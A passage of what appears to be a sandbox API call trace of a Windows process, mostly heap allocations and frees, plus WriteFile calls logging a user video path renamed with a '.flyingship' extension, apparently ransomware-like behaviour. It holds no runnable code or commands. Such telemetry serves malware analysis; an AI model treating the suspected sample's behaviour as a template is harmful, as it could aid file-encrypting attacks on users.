SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0198.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0198.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.flyingship.avi\r\n", cchWideChar=89, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0198.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x59) returned 0x9a5de0 [0198.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.flyingship.avi\r\n", cchWideChar=89, lpMultiByteStr=0x9a5de0, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 89 [0198.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0198.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0198.872] WriteFile (in: hFile=0x160, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x58, lpOverlapped=0x0) returned 1 [0198.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0198.873] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.873] CloseHandle (hObject=0x160) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.874] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0198.874] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0198.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.875] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0198.875] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.875] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.875] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.876] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0198.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0198.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0198.876] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.876] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0198.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0198.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.877] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.878] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0198.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0198.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0198.879] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.879] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.879] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.880] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.881] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0198.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) 